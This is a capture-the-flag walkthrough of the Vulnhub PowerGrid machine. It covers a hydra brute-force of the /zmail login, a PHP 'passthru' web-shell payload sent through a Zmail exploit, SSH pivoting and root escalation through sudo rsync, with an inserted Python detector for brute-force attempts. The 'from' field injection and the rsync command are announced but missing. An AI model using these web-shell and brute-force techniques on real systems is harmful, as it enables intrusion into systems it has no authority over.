Today we are going to hack the Vulnhub machine called
PowerGrid. You can download it from the following link:
PowerGrid
Video
Enumeration
We start with an nmap scan to see which ports
are open.
~ > nmap -A -p- 192.168.1.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 10:42 CEST
Nmap scan report for powergrid.home (192.168.1.147)
Host is up (0.00051s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PowerGrid - Turning your lights off unless you pay.
143/tcp open imap Dovecot imapd
|_imap-capabilities: more capabilities IMAP4rev1 post-login IDLE have STARTTLS ID ENABLE SASL-IR Pre-login OK LOGINDISABLEDA0001 LOGIN-REFERRALS listed LITERAL+
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after: 2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: more IMAP4rev1 LITERAL+ post-login have capabilities ID ENABLE SASL-IR Pre-login OK LOGIN-REFERRALS IDLE listed AUTH=PLAINA0001
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after: 2030-05-17T16:49:55
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.79 seconds
On the landing page we see 3 possible usernames.
gobuster also finds the /zmail directory, which
asks for a username and password when we open it.
We use hydra to brute-force it and see whether we get a
password; in this case we try with the user p48.
~ > hydra -l p48 -P rockyou.txt 192.168.1.147 http-get -m /zmail
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-18 10:44:18
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.1.147:80/zmail
[STATUS] 8574.00 tries/min, 8574 tries in 00:01h, 14335825 to do in 27:53h, 16 active
[STATUS] 8741.00 tries/min, 26223 tries in 00:03h, 14318176 to do in 27:19h, 16 active
[STATUS] 8754.43 tries/min, 61281 tries in 00:07h, 14283118 to do in 27:12h, 16 active
[80][http-get] host: 192.168.1.147 login: p48 password: electrico
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-18 10:57:20
We see that hydra finds that electrico is the password
for the user p48.
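Seen from the defender's side, that hydra run is a burst of 401 responses against /zmail in the Apache access log at thousands of tries per minute. The detector below is an added example, not code from the original post: it parses constructed access_log lines (the source IPs and timestamps are made up) and alerts on any source that reaches a threshold of failed logins against /zmail inside a sliding window, flagging whether a 200 followed.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample access_log lines (not from the original page) mimicking the
# trail the hydra http-get run above leaves: a burst of 401s against /zmail from
# one source, then a 200 once the password hits. 192.168.1.33 mistyped once only.
SAMPLE_LOG = """\
192.168.1.10 - p48 [18/Jul/2020:10:44:18 +0200] "GET /zmail/ HTTP/1.0" 401 459
192.168.1.10 - p48 [18/Jul/2020:10:44:18 +0200] "GET /zmail/ HTTP/1.0" 401 459
192.168.1.10 - p48 [18/Jul/2020:10:44:19 +0200] "GET /zmail/ HTTP/1.0" 401 459
192.168.1.10 - p48 [18/Jul/2020:10:44:19 +0200] "GET /zmail/ HTTP/1.0" 401 459
192.168.1.10 - p48 [18/Jul/2020:10:44:20 +0200] "GET /zmail/ HTTP/1.0" 401 459
192.168.1.10 - p48 [18/Jul/2020:10:44:21 +0200] "GET /zmail/ HTTP/1.0" 200 2310
192.168.1.33 - p48 [18/Jul/2020:10:50:00 +0200] "GET /zmail/ HTTP/1.1" 401 459
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse the Apache common-log prefix (ip ident user [ts] "req" status) or return None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))

def detect_bruteforce(lines, path_prefix="/zmail", threshold=5, window_s=60):
    """Alert on each source IP that produces `threshold` 401s against `path_prefix`
    inside any `window_s` second sliding window; note whether a 200 followed."""
    failures, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec[2].startswith(path_prefix):
            continue
        ip, ts, _, status = rec
        if status in (401, 200):
            (failures if status == 401 else successes)[ip].append(ts)
    alerts = []
    for ip, stamps in failures.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):      # sliding window over the 401s
            while (ts - stamps[start]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:                  # 200 after last 401 => likely compromised
            alerts.append({"ip": ip, "peak_failures": peak,
                           "success_after": any(s >= stamps[-1] for s in successes[ip])})
    return alerts
```

At hydra's real rate (about 8,500 tries per minute in the output above) the threshold is crossed within the first second, so a per-source rate limit or lockout on the /zmail basic-auth realm would have stopped the run long before the wordlist reached electrico.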
We log in using the credentials.
In the mail we find:
Listen carefully. We are close to our attack date. Nothing is going to stop us
now. Our malware is heavily planted in each power grid across Europe.
All it takes is a signal from this server after the timer has stopped, and
nothing is going to stop that now.
For information, I have setup a backup server located on the same network - you
shouldn't need to access it for now, but if you do, scan for its local IP and
use the SSH key encrypted below (it is encrypted with your GPG key, by the
way).
The backup server has root access to this main server - if you need to make any
backups, I will leave it for you to work out how.
I haven't got time to explain - we are too close to launching our hack.
We can see that it mentions the message is encrypted with our private
GPG key, and that there is a "backup" server which has root access to the
main system...
Exploitation
Checking the Zmail version, we see that it is 1.2.2 and
that it is vulnerable to the following exploit[1].
After reading the PoC we see that we have to put the PHP code
we want executed in the subject, and when sending the mail we must
modify the "from" field, passing it parameters so that the contents of
the subject are saved as a PHP file, which we can then access.
Knowing this, we start Burp Suite.
We create a new mail and as the subject we put:
<?php echo passthru($_GET['cmd']);?>
As the recipient we can use example@example.com
We click send and intercept the request with Burp.
Once intercepted, we modify the from field so that it contains:
We obtain privatekey.gpg; with this we now have
the encrypted message, the key and the password (electrico).
We go to the following site:
https://www.igolder.com/pgp/decryption/
and enter the data needed to
decrypt the message.
Once done, we obtain the SSH key.
Once we have the key, we create a file
on the system containing it.
p48@powergrid:~$ ip addr show
ip addr show
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:db:94:d2 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.62/24 brd 192.168.1.255 scope global dynamic eth0
valid_lft 84153sec preferred_lft 84153sec
inet6 2a01:c50e:21e3:0:a00:27ff:fedb:94d2/64 scope global dynamic mngtmpaddr
valid_lft 1773sec preferred_lft 573sec
inet6 fe80::a00:27ff:fedb:94d2/64 scope link
valid_lft forever preferred_lft forever
3: docker0: mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:1e:c8:e0:9c brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:1eff:fec8:e09c/64 scope link
valid_lft forever preferred_lft forever
We see that we have interface 3, called docker0, with the IP
172.17.0.1.
The email said they had a backup server on the same network,
so we ping the next IP in that range to see whether
we find the backup server...
p48@powergrid:~$ ping 172.17.0.2 -c 1
ping 172.17.0.2 -c 1
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.061 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.061/0.061/0.061/0.000 ms
We see that the IP 172.17.0.2 responds.
We use the key to log in to the backup server.
p48@powergrid:~$ ssh p48@172.17.0.2 -i ssh.key
ssh p48@172.17.0.2 -i ssh.key
Linux ef117d7a978f 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 20 00:22:30 2020 from 172.17.0.1
p48@ef117d7a978f:~$
p48@ef117d7a978f:~$ cat flag2.txt
cat flag2.txt
047ddcd1f33dfb7d80da3ce04e89df73
Well done for getting flag 2. It looks like this user is fairly unprivileged.
We check whether we can do anything with sudo.
p48@ef117d7a978f:~$ sudo -l
sudo -l
Matching Defaults entries for p48 on ef117d7a978f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User p48 may run the following commands on ef117d7a978f:
(root) NOPASSWD: /usr/bin/rsync
We can use rsync, which can give us
a root shell :)
# cd /root
# ls -la
total 36
drwx------ 1 root root 4096 May 19 23:57 .
drwxr-xr-x 1 root root 4096 May 19 18:13 ..
lrwxrwxrwx 1 root root 9 May 19 18:33 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 19 19:00 .ssh
-rw------- 1 root root 8115 May 19 23:57 .viminfo
-rw-r--r-- 1 root root 112 May 19 23:57 flag3.txt
# cat flag3.txt
009a4ddf6cbdd781c3513da0f77aa6a2
Well done for getting the third flag. Are you any good at pivoting backwards?
The mail said that root on the backup server had access
to the main server, so we connect via ssh as root
to the main system again....
Privilege Escalation
# ssh root@172.17.0.1
Linux powergrid 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 18:15:49 2020
root@powergrid:~#
flag4.txt
root@powergrid:~# cd /root
cd /root
root@powergrid:~# ls -la
ls -la
total 72
drwx------ 7 root root 4096 May 26 18:15 .
drwxr-xr-x 18 root root 4096 May 19 17:42 ..
lrwxrwxrwx 1 root root 9 May 19 18:17 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 4 root root 4096 May 19 18:28 .cache
-rwx--x--x 1 root root 85 May 20 08:23 chown.sh
-rw-r--r-- 1 root root 472 May 20 08:25 flag4.txt
drwx------ 5 root root 4096 May 19 20:16 .gnupg
drwxr-xr-x 3 root root 4096 May 20 01:24 .local
-rwxr-xr-x 1 root root 494 May 20 00:49 malware.php
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 74 May 19 20:36 .selected_editor
drwx------ 2 root root 4096 May 19 20:00 .ssh
drwxr-xr-x 2 root root 4096 May 19 19:35 .vim
-rw------- 1 root root 11142 May 26 18:12 .viminfo
-rw------- 1 root root 55 May 19 18:24 .Xauthority
-rw-r--r-- 1 root root 1220 May 26 18:15 'ystemctl status docker'
root@powergrid:~# cat flag4.txt
f5afaf46ede1dd5de76eac1876c60130
Congratulations. This is the fourth and final flag. Make sure to delete
/var/www/html/startTime.txt to stop the attack (you will need to run chattr -i
/var/www/html/startTime.txt first).
_._ _,-'""`-._
(,-.`._,'( |\`-/|
`-.-' \ )-`( , o o)
`- \`_`"'-
This CTF was created by Thomas Williams - https://security.caerdydd.wales
Please visit my blog and provide feedback - I will be glad to hear your
comments.
root@powergrid:~#
End
And with that we are root on the machine.
[1] https://www.exploit-db.com/exploits/40892